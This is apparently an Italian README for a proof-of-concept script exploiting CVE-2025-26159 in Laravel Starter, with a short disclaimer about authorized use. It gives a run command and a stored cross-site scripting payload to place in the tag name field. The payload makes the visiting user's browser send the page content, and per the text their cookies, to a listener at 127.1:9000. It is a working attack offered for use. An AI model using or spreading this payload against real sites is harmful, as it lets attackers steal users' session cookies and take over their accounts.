
Questo script decodifica, filtra ed estrae i cookie come parte dello sfruttamento di CVE-2025-26159.
Questo script può essere utilizzato solo in ambienti autorizzati in cui è stato concesso esplicito permesso. L'autore non è responsabile per qualsiasi uso improprio, danno o conseguenze derivanti dall'utilizzo di questo script.
Questo script decodifica, filtra ed estrae cookie come parte dello sfruttamento di CVE-2025-26159.
Per comprendere i passaggi di sfruttamento, dai un'occhiata a questo articolo sul mio blog.
go run CVE-2025-26159.go
Nel campo del nome del tag di Laravel Starter, inserisci questo payload:
<script>fetch("/",{credentials:"include"}).then(r=>r.text()).then(d=>location='//127.1:9000/d='+escape(d))</script>
Dopo che un utente visita la pagina dei dettagli del tag dannoso, riceverai i suoi cookie.